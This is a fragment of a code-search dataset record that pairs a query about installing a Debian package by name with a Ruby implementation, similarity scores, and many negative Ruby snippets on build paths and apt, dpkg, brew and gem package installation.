"def pkg_dir\n @pkg_dir ||= File.join( self.build_dir, \"#{name + ( version ? \"-#{version}\" : \"\" ) }\" )\n end",
"def generate_build_location(id)\n \"#{@config.output_dir}#{@config.prefix}/#{id}\"\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def build_output_dir\n root.join(public_dir, public_output_dir)\n end",
"def local_path\n fetch_path(DevTools.gem_root)\n end",
"def build_file\n @file = \"#{build_publish_date}-#{build_file_name}.#{build_tags}.#{build_filter}\"\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
"def _local_source(path)\n existent = ::Dir[\"#{ENV['DEV_HOME']}/*/{piktur/#{path},gems/#{path},#{path}}\"][0]\n Pathname(existent)\n end",
"def run_dir\n run_base + \"/g4.#{geant_version}_cms_#{cmssw_version}/#{build_type}/CMSSW_#{cmssw_version}/src\"\n end",
"def pkg_build\n sysprint \"#{@name} build\"\n\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec @build\n syserr \"Failed to compile package #{@name}\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def src_path\n File.dirname(__FILE__)\nend",
"def src_path\n File.dirname(__FILE__)\nend",
"def lib_out\n @mpc_project.recipe.get_relative_path(@mpc_project.lib_out)\n end",
"def build_project(go)\n content = {\n \"active\" => true,\n \"path\" => BASEDIR + \"/#{go}\"\n }\n return content\n end",
"def build_archive_dir\n out = config_source['build-archive-dir']\n out = nil if (out != nil && out.downcase == 'none')\n out = FilePath.new(out) unless out.nil?\n out\n end",
"def min_file_path\n compiled_path || current_file_path\n end",
"def pathSourcePackageJson\n\t\"./package-template.json\"\nend",
"def path\n Rails.root.join(ROOT, type, name, executable).to_s\n end",
"def build_info_file\n File.join build_info_dir, \"#{full_name}.info\"\n end",
"def build(env, request, path)\n stdout, stderr, status = Open3.capture3(CLI, Rails.root.to_s, path)\n\n if status.success?\n raise \"[froxy] build failed: #{stderr}\" unless stderr.empty?\n else\n non_empty_streams = [stdout, stderr].delete_if(&:empty?)\n raise \"[froxy] build failed:\\n#{non_empty_streams.join(\"\\n\\n\")}\"\n end\n\n path_to_file env, request, path\n end",
"def build_info_dir\n File.join base_dir, \"build_info\"\n end",
"def build\n output_filepath = \"#{self.build_path}/#{OUTPUT_FILENAME}\"\n\n Dir.chdir \"#{self.build_path}\"\n\n # Need 1.9.4 version in order have file encoding\n cmd = \"#{ENV['ant']} #{@config[:build_name]}\"\n #cmd = \"/usr/local/bin/ant #{@config[:build_name]}\"\n\n log \"Running '#{cmd}' in #{self.build_path}\"\n output = system(cmd)\n\n return output_filepath\n end",
"def package_dir\n config.package_dir\n end",
"def build_path\n end",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def project_file(fname)\n \"#{@project_path}/#{fname}\"\nend",
"def assets_manifest_path\n build_output_dir.join('manifest-assets.json')\n end",
"def android_build_root()\n \"#{build_root}/android\"\n end",
"def build_dist_path(item)\n sub_build_dir = File.join(@config.build_dir, item.name)\n return Dir[File.join(sub_build_dir, \"#{item.name}-[0-9.]*.tar.gz\")][0]\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def build_gem; end",
"def iphone_build_root()\n \"#{build_root}/iphone\"\n end",
"def package_path(extension='.gem')\n File.join(package_dir, package_basename(extension))\n end",
"def gem_build_complete_path # :nodoc:\n File.join extension_dir, 'gem.build_complete'\n end",
"def source_dir\n Dir.pwd\nend",
"def makePath\n\t\t\tbuildMgr.effective(filename).dirname.mkpath\n\t\tend",
"def path_from_package(package_name)\n ret = package_from_name package_name\n ret && ret.root_path\n end",
"def bundle_dir\n File.expand_path(File.join(Bixby.repo_path, self.relative_path))\n end",
"def carthage_build_path(platform, framework)\n return \"#{carthage_build_dir_for_platform(platform)}/#{framework}\"\nend",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def get_build_fname(source_fname, suffix, builder_class)\n if extra_path = builder_class.extra_path\n extra_path = \"/#{extra_path}\"\n end\n \"#{@build_root}#{extra_path}/#{Util.make_relative_path(\"#{source_fname}#{suffix}\")}\".gsub(\"\\\\\", \"/\")\n end",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def make_installer_gtifw exe_path\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def dotfile( name )\n File.join( build_dir, \".#{name}\" )\n end",
"def make_carthage_build_path(name, platform)\n return \"Carthage/Build/#{platform}/#{name}\"\nend",
"def package_scripts_path(arg = NULL)\n if null?(arg)\n @package_scripts_path || \"#{Config.project_root}/package-scripts/#{name}\"\n else\n @package_scripts_path = File.expand_path(arg)\n end\n end",
"def package_scripts_path(arg = NULL)\n if null?(arg)\n @package_scripts_path || \"#{Config.project_root}/package-scripts/#{name}\"\n else\n @package_scripts_path = File.expand_path(arg)\n end\n end",
"def source_path; end",
"def component_src_path(cmp)\n File.join WORK_PATH, 'src', cmp\nend",
"def component_src_path(cmp)\n File.join WORK_PATH, 'src', cmp\nend",
"def ipa_path\n File.join(BuildCommandGenerator.build_path, \"#{Gym.config[:output_name]}.ipa\")\n end",
"def license_package_location(component_name, where)\n if local?(where)\n File.join(output_dir, \"#{component_name}-#{File.split(where).last}\")\n else\n u = URI(where)\n File.join(output_dir, \"#{component_name}-#{File.basename(u.path)}\")\n end\n end"
] | [
"0.7177168",
"0.71356404",
"0.7130146",
"0.7112139",
"0.70762694",
"0.704427",
"0.70293415",
"0.6967646",
"0.6964182",
"0.6778268",
"0.6737313",
"0.6720476",
"0.6702654",
"0.66772133",
"0.6621196",
"0.6613639",
"0.6557876",
"0.65513676",
"0.65442437",
"0.65442437",
"0.6502655",
"0.6500191",
"0.6470467",
"0.6463668",
"0.64504015",
"0.6422524",
"0.64171046",
"0.64140916",
"0.6406237",
"0.640375",
"0.6366067",
"0.63429",
"0.63347465",
"0.6327715",
"0.63123703",
"0.6301781",
"0.6284352",
"0.62832874",
"0.6269984",
"0.6266252",
"0.6257643",
"0.6249938",
"0.62314844",
"0.6210456",
"0.62080854",
"0.62080854",
"0.6206701",
"0.6193654",
"0.61897117",
"0.618819",
"0.618819",
"0.61719686",
"0.61656255",
"0.61558056",
"0.6132772",
"0.6129459",
"0.6110103",
"0.6110103",
"0.60891265",
"0.6080063",
"0.6079863",
"0.6079221",
"0.60542816",
"0.60091364",
"0.59806156",
"0.5977091",
"0.5976874",
"0.59710383",
"0.59654826",
"0.59644043",
"0.5952094",
"0.594987",
"0.59347665",
"0.5926026",
"0.5907039",
"0.59063154",
"0.5906128",
"0.59013927",
"0.5900599",
"0.58918434",
"0.58901364",
"0.5887383",
"0.5874184",
"0.5873885",
"0.5845994",
"0.5843203",
"0.5833066",
"0.5828184",
"0.58276176",
"0.5823161",
"0.5823161",
"0.5818356",
"0.5813278",
"0.58072567",
"0.58072567",
"0.58035856",
"0.5793035",
"0.5793035",
"0.5782682",
"0.577105"
] | 0.58402926 | 86 |
Install package by name, where pkg is the Debian package name | def install(pkg_name)
begin
pkg_build_dir = packaging_dir(pkg_name)
filepath = Dir.glob("#{pkg_build_dir}/*.deb")
if filepath.size < 1
raise RuntimeError, "No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}"
elsif filepath.size > 1
raise RuntimeError, "More than one debian file available in #{pkg_build_dir}: #{filepath}"
else
filepath = filepath.first
Packager.info "Found package: #{filepath}"
end
install_debfile(filepath)
rescue Exception => e
raise RuntimeError, "Installation of package '#{pkg_name} failed -- #{e}"
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def install_package host, package_name\n host.install_package package_name\n end",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def install(packagename, force=false)\n\t\t\t\traise(InstallError, \"Automated package installation is not implemented on OpenBSD\")\n\t\t\tend",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def apt_install(pkg, check=false)\n if check && pkg_installed?(pkg)\n info %{Package \"#{pkg}\" is already installed, skipping.}\n else\n run %{apt-get install -y #{pkg}}\n end\nend",
"def install_package(name, version)\n package_provider.install_package\n end",
"def install_package host, package_name, package_version = nil\n host.install_package package_name, '', package_version\n end",
"def package_if_necessary(pkg)\n if !package_is_installed?(pkg)\n banner \"#{pkg}...\"\n run \"apt-get -y install #{pkg}\"\n end\n end",
"def install_pkgs! pkgs, opts\n log_shell \"Installing packages\", \"#{pkg_cmd} --sync --noconfirm --noedit --noprogressbar #{pkgs.join(' ')}\", :sudo => false\n end",
"def install(packagename, force=false)\n\t\t\t\tpackagename.strip!()\n\n\t\t\t\t# FIXME - check to see if it is already installed\n\n\t\t\t\tCfruby.controller.attempt(\"Installing \\\"#{packagename}\\\"\", 'destructive', 'unknown', 'install') {\n\t\t\t\t\t`#{@rpmbin} -i '#{packagename.gsub(/(\\')/, \"\\\\\\1\")}'`\n\t\t\t\t}\n\t\t\tend",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def install_packages(app)\n\n `installer -pkg \"#{app}\" -target /`\n\nend",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def install\n pacman \"--noconfirm\", \"--noprogressbar\", \"-Sy\", @resource[:name]\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\"Could not find package %s\" % self.name)\n end\n end",
"def install(packagename, force=false)\n\t\t\t\tpackagename.strip!()\n\n\t\t\t\t# FIXME - check to see if it is already installed\n\n\t\t\t\tCfruby.controller.attempt(\"Installing \\\"#{packagename}\\\"\", 'destructive', 'unknown', 'install') {\n\t\t\t\t\t`#{@finkbin} install '#{packagename.gsub(/(\\')/, \"\\\\\\1\")}'`\n\t\t\t\t}\n\t\t\tend",
"def install!(name:, dir: nil)\r\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def install_sol11_pkg(options,pkg_name)\n pkg_test = %x[which #{pkg_name}]\n if pkg_test.match(/no #{pkg_name}/)\n message = \"Information:\\tChecking Package \"+pkg_name+\" is installed\"\n command = \"pkg info #{pkg_name} 2>&1| grep \\\"Name:\\\" |awk \\\"{print \\\\\\$3}\\\"\"\n output = execute_command(options,message,command)\n if not output.match(/#{pkg_name}/)\n message = \"Information:\\tChecking publisher is online\"\n command = \"pkg publisher | grep online\"\n output = execute_command(options,message,command)\n if output.match(/online/)\n message = \"Information:\\tInstalling Package \"+pkg_name\n command = \"pkg install #{pkg_name}\"\n execute_command(options,message,command)\n end\n end\n end\n return\nend",
"def install\n cd_and_sh( pkg_dir, install_commands )\n end",
"def install!\n src = package_source\n chk = package_checksum\n windows_package 'Chef Development Kit' do\n source src\n checksum chk\n end\n end",
"def install\n self.run_preseed if @resource[:responsefile]\n should = @resource[:ensure]\n\n checkforcdrom\n cmd = %w{-q -y}\n\n keep = \"\"\n if config = @resource[:configfiles]\n if config == :keep\n cmd << \"-o\" << 'DPkg::Options::=--force-confold'\n else\n cmd << \"-o\" << 'DPkg::Options::=--force-confnew'\n end\n end\n\n str = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version and --force-yes option\n str += \"=#{should}\"\n cmd << \"--force-yes\"\n end\n\n cmd << :install << str\n\n aptget(*cmd)\n end",
"def install(name:, dir: nil)\r\n end",
"def install_package(target_package_path); raise NotImplementedError; end",
"def install_dep(name, version, install_dir = nil)\n install_dir ||= '/etc/puppet/modules'\n \"mkdir -p #{install_dir} && (puppet module list | grep #{name}) || puppet module install -v #{version} #{name}\"\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def pkg_default_install\n bsdstyle = @bsdstyle\n make = @make\n sudo_cmd = ''\n\n if bsdstyle == true\n sudo_cmd = 'sudo'\n end\n if make.length == 0\n make = $bsyscfg.get_make\n end\n\n <<INSTALL\n#{sudo_cmd} #{make} DESTDIR=#{$project_rootdir}/ install\nINSTALL\n end",
"def install(package)\n wait_until(\"Installing package\") do\n get \"/invoke/wm.server.packages/packageInstall?activateOnInstall=true&file=#{CGI.escape package.to_s}\"\n end\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def install_custom!\n do_dmg_package_resource!\n end",
"def linux_installer(package)\n\t\t\t\tsystem(\"sudo apt-get -y install #{package}\")\n\t\t\tend",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def install!\n include_recipe 'apt'\n enable_i386_arch!\n add_repository!\n package('skype') { action :install }\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted += \"-#{should}\"\n end\n output = rug \"--quiet\", :install, \"-y\", wanted\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install(package)\n\n return @results[:install] = 'no route to internet' unless internet?\n return @results[:install] = 'already installed' if installed? package\n \n instructions = \"apt-get update && apt-get install #{package} -y\"\n r = @ssh ? @ssh.exec!(instructions) : `#{instructions}`\n puts 'r: ' + r.inspect if @debug\n @results[:install] = r.chomp\n\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def install(nofail = false)\n name = @resource[:name]\n should = @resource[:ensure]\n is = self.query\n if is[:ensure].to_sym == :absent\n command = 'install'\n else\n command = 'update'\n end\n args = ['--accept']\n if Puppet::Util::Package.versioncmp(Puppet.runtime[:facter].value(:operatingsystemrelease), '11.2') >= 0\n args.push('--sync-actuators-timeout', '900')\n end\n args.concat(join_options(@resource[:install_options])) if @resource[:install_options]\n unless should.is_a? Symbol\n name += \"@#{should}\"\n end\n self.unhold if self.properties[:mark] == :hold\n begin\n r = exec_cmd(command(:pkg), command, *args, name)\n ensure\n self.hold if @resource[:mark] == :hold\n end\n return r if nofail\n raise Puppet::Error, _(\"Unable to update %{package}\") % { package: r[:out] } if r[:exit] != 0\n end",
"def autoinstall(*packages)\n all_packages_installed = packages.all? { |pkg| Path.which pkg }\n\n unless all_packages_installed\n cmd([\"sudo apt-get install ?\", packages.join(' ')])\n end\nend",
"def dist_install( *pkgs )\n raise \"Include a distro-specific component, e.g. Debian, RHEL\"\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def install\n bin.install \"cmd/brew-pkg.rb\"\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def easy_install(package_path)\n upload_package(package_path)\n install_package\n end",
"def apt_install(packages)\n packages = packages.split(/\\s+/) if packages.respond_to?(:split)\n packages = Array(packages)\n apt_get=\"DEBCONF_TERSE='yes' DEBIAN_PRIORITY='critical' DEBIAN_FRONTEND=noninteractive apt-get\"\n sudo \"#{apt_get} -qyu --force-yes install #{packages.join(\" \")}\"\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def install!\n cmd = [attributes.gem_binary, 'install']\n cmd << '-v' << attributes.version if attributes.version\n cmd << '--source' << attributes.source if attributes.source\n cmd << '--prerelease' if attributes.prerelease\n cmd << attributes.package_name\n\n run_command(cmd)\n end",
"def package(name, version=nil, options={:q => true, :y => true})\n name = \"#{name}=#{version}\" unless version.to_s.strip.empty?\n execute \"apt-get install\", name, options\n chain_proxy\n end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def apt_get_update_install\n @app.packages.present? ? install_additional_packages : update_apt\n end",
"def install_brew_pkg(options,pkg_name)\n pkg_status = check_brew_pkg(options,pkg_name)\n if pkg_status.match(/Not installed/)\n message = \"Information:\\tInstalling Package \"+pkg_name\n command = \"brew install #{pkg_name}\"\n execute_command(options,message,command)\n end\n return\nend",
"def install_package(names, versions)\n names.each_with_index do |name, index|\n cmd = powershell_exec(build_powershell_package_command(\"Install-Package '#{name}'\", versions[index]), timeout: new_resource.timeout)\n next if cmd.nil?\n raise Chef::Exceptions::PowershellCmdletException, \"Failed to install package due to catalog signing error, use skip_publisher_check to force install\" if /SkipPublisherCheck/.match?(cmd.error!)\n end\n end",
"def install_gem; end",
"def apt_install(packages)\n packages = packages.split(/\\s+/) if packages.respond_to?(:split)\n packages = Array(packages)\n sudo_with_input(\"#{apt_get_preamble} install #{packages.join(\" \")}\", /\\?/, \"\\n\")\n end",
"def packages debs, role\n run \"#{sudo} apt-get -y update && #{sudo} apt-get -y upgrade && #{sudo} apt-get install -y #{debs}\", :role => role\nend",
"def install\n Puppet.notice \"Installing #{@resource[:name]}\"\n should = @resource[:ensure]\n package_name = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n package_name += \"-#{should}\"\n end\n Puppet.debug \" Package: #{package_name}\"\n\n if install_options.any?\n output = execute([command(:brew), :install, package_name, *install_options])\n else\n output = execute([command(:brew), :install, package_name])\n end\n\n # Fail hard if there is no formula available.\n if output =~ /Error: No available formula/\n raise Puppet::ExecutionFailure, \"Could not find package #{@resource[:name]}\"\n end\n\n #if linkapps?\n # output = execute([command(:brew), :linkapps])\n #end\n end",
"def install\n bin.install \"sack\", \"sag\", \"sgrep\", \"F\"\n end",
"def action_install(type)\n from = Automation::Converter.to_unix_path(prompt('Install from : '))\n package_rb = File.join(from, 'package.rb')\n require package_rb\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{package_rb}'\") unless PACKAGE_CLASS.has_key?(package_rb)\n plugin = PACKAGE_CLASS[package_rb].new\n plugin.install(from)\n puts \"Installed '#{type}' - #{plugin.name}\"\n end",
"def dist_install_s( *args )\n if args.last.is_a?( Hash )\n args = args.dup\n opts = args.pop\n else\n opts = {}\n end\n\n args = dist_map_packages( args )\n\n if opts[ :succeed ]\n \"yum install -q -y #{args.join ' '} || true\"\n else\n \"yum install -q -y #{args.join ' '}\"\n end\n end",
"def install\n end",
"def install_additional_packages\n <<~APT\n # Install app-specific Ubuntu packages\n RUN DEBIAN_FRONTEND=noninteractive apt-get update && apt-get install -y #{NL_TAB}#{@app.packages.join(\" #{NL_TAB}\")}\n APT\n end",
"def install\n yaourt('--noconfirm', '-Sy', @resource[:name])\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def install\n should = @resource[:ensure]\n\n package_name = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n package_name += \"-#{should}\"\n end\n\n output = brew(:install, package_name)\n\n # Fail hard if there is no formula available.\n if output =~ /Error: No available formula/\n raise Puppet::ExecutionFailure, \"Could not find package #{@resource[:name]}\"\n end\n end",
"def install\n ssh.exec! \"curl -O https://opscode-omnibus-packages.s3.amazonaws.com/ubuntu/12.04/x86_64/chefdk_0.0.1-1_amd64.deb\"\n ssh.exec! \"dpkg --install chefdk_0.0.1-1_amd64.deb\", sudo: true\n ssh.exec! \"rm chefdk_0.0.1-1_amd64.deb\", sudo: true\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def install_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package 'chefdk' do\n version new_resource.version unless new_resource.version == 'latest'\n end\n end",
"def install\n end",
"def install\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def action_install\n run_package_action(:install)\n end",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def install\n cmd = %w{--noconfirm --noedit --deps --builddir /tmp}\n cmd += install_options if @resource[:install_options]\n cmd << \"-S\" << @resource[:name]\n\n aurget(*cmd)\n\n unless self.query\n fail(\"Could not find package '#{@resource[:name]}'\")\n end\n end",
"def install_pkgmgr\n announcing 'Installing Package Manager' do\n chroot 'install_pkgmgr'\n end\n send_to_state('build', 'install_pkgmgr')\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
